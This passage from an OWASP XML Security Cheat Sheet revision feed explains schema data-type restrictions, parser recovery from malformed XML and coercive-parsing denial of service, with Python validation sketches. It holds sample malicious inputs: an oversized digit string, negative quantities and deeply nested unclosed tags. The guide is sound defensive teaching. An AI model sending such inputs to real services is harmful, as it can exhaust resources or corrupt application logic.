  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after these definitions. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since the DTD places no restriction on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string is valid and could be sent to the server. Typically this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
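The restrictions that the DTD cannot express can be sketched in application code. The following Python example is only an illustration: the limits &amp;lt;tt&amp;gt;MAX_DIGITS&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;MAX_AGE&amp;lt;/tt&amp;gt; and the function &amp;lt;tt&amp;gt;is_valid_age&amp;lt;/tt&amp;gt; are assumptions made for this sketch, not values taken from any specification:&lt;br /&gt;

```python
MAX_DIGITS = 3   # assumed limit for this sketch
MAX_AGE = 150    # assumed upper bound for this sketch


def is_valid_age(text):
    """Check length and character set before converting the value."""
    if not text or len(text) > MAX_DIGITS:
        return False
    if not (text.isascii() and text.isdigit()):
        return False
    return MAX_AGE >= int(text)


# The one-million-digit value from the document above.
oversized = "1" * 1_000_000
```

The length check runs first so that an oversized value is discarded before any conversion is attempted.&lt;br /&gt;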
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to input it was never designed to handle. The result could be the disclosure of internal errors, or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need a hexadecimal value, there is no point in defining it as a string that will later be restricted to the 16 hexadecimal characters; a dedicated data type such as &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; should be used instead. The same applies to other encodings: when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance accepted any type of characters within this element after a valid base64 value and still considered it valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced, which suggests that the information was checked by application code instead of being validated against the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
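The effect of a negative quantity on the calculation can be sketched in a few lines of Python. The function &amp;lt;tt&amp;gt;total_price&amp;lt;/tt&amp;gt; is a hypothetical stand-in for the application logic, and it applies the same lower bound that a positive integer type would enforce:&lt;br /&gt;

```python
from decimal import Decimal


def total_price(price, quantity):
    """Compute price*quantity, rejecting quantities below 1."""
    if not quantity >= 1:
        raise ValueError("quantity must be a positive integer")
    return price * quantity


# Without the check, a negative quantity produces a negative total,
# which could end up as a credit on the attacker's account.
unchecked_total = Decimal("10") * -1
```

Enforcing the bound in the schema is preferable, because the invalid document is then rejected before any business logic runs.&lt;br /&gt;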
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. Some XML schema data types exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If the schema uses a data type that admits zero instead, a zero denominator may still trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these types are commonly used to hold values that should only ever be real numbers, such as prices. This is a common error seen in other programming languages as well, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
With this schema, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to Infinity or &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; is rejected as invalid, so it cannot trigger errors in the application. If the data type allowed those values, an attacker could exploit them.&lt;br /&gt;
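The same pitfall exists outside XML schemas. As an illustration only, Python’s built-in &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; also accepts the special values, so code that expects a plain real number has to reject them explicitly. The function &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is a hypothetical helper written for this sketch:&lt;br /&gt;

```python
import math


def parse_price(text):
    """Parse a price and reject the special values allowed by float."""
    value = float(text)
    if not math.isfinite(value):
        raise ValueError("price must be a finite number")
    return value


# float() accepts these spellings without complaint.
special = [float("INF"), float("-INF"), float("NaN")]
# NaN silently propagates through later arithmetic.
nan_total = float("NaN") * 3
```

A decimal type in the schema removes the need for this kind of check, because the special values are never valid in the first place.&lt;br /&gt;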
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called an &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one specific length (for example, 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
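A schema pattern must match the whole value. When the same check is reproduced in application code, the equivalent is a full match and not a search. The following Python sketch shows the difference; the function &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is a hypothetical helper, and the expression is copied from the schema above:&lt;br /&gt;

```python
import re

# Same expression as the schema pattern above.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(text):
    """Return True only when the whole string matches the pattern."""
    return SSN_PATTERN.fullmatch(text) is not None


# A search finds the pattern inside a longer string, so it would accept this.
tainted = "id=123-45-6789;extra"
search_accepts_tainted = SSN_PATTERN.search(tainted) is not None
```

Using a search instead of a full match is a common way to weaken a pattern without noticing it.&lt;br /&gt;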
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that zero is rejected as a &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt;, while negative numbers remain valid.&lt;br /&gt;
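The rule expressed by the assertion can be sketched as an equivalent check in Python. The function &amp;lt;tt&amp;gt;safe_divide&amp;lt;/tt&amp;gt; is hypothetical and only mirrors the assertion: zero is refused, and any other integer, including negative ones, is accepted:&lt;br /&gt;

```python
def safe_divide(numerator, denominator):
    """Divide after applying the same rule as the assertion: no zero."""
    if denominator == 0:
        raise ValueError("denominator must not be zero")
    return numerator / denominator
```

Raising a controlled error here avoids exposing the interpreter’s own division error to the caller.&lt;br /&gt;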
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed, and a maximum number should eventually be used instead of an unbounded value.&lt;br /&gt;
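Where the schema cannot be changed right away, an upper bound can be sketched in application code. In the following Python example the limit &amp;lt;tt&amp;gt;MAX_BUY_ELEMENTS&amp;lt;/tt&amp;gt; and the helpers &amp;lt;tt&amp;gt;build_operation&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;within_limit&amp;lt;/tt&amp;gt; are assumptions made for illustration, and the test documents are built with the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; API:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 100   # assumed limit for this sketch


def build_operation(count):
    """Build an operation element holding `count` empty buy elements."""
    operation = ET.Element("operation")
    for _ in range(count):
        ET.SubElement(operation, "buy")
    return operation


def within_limit(operation, limit=MAX_BUY_ELEMENTS):
    """Reject documents carrying more buy elements than the limit."""
    return limit >= len(operation.findall("buy"))
```

This check runs after the document has already been parsed into memory, so it does not replace a numeric &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; in the schema; it only stops oversized documents from reaching later processing steps.&lt;br /&gt;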
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224409</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224409"/>
				<updated>2016-12-21T15:49:32Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken for a malformed one. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up—and eventually deplete—the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.6 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplifies the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
